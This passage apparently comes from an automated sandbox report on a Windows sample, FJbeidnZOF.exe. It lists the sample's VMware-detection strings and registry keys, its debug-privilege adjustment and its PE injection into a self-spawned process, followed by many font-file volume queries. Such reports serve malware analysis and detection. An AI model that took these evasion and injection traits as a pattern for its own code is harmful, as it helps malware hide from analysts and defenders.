                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: VMWARE
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: FJbeidnZOF.exe, 00000001.00000002.238670841.0000000002532000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]5_2_0040317B
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeCode function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,5_2_00402B7C
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Injects a PE file into a foreign processesShow sources
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeMemory written: C:\Users\user\Desktop\FJbeidnZOF.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeProcess created: C:\Users\user\Desktop\FJbeidnZOF.exe C:\Users\user\Desktop\FJbeidnZOF.exeJump to behavior
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmpBinary or memory string: Progman
                Source: FJbeidnZOF.exe, 00000005.00000002.479886639.0000000001240000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Users\user\Desktop\FJbeidnZOF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FJbeidnZOF.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
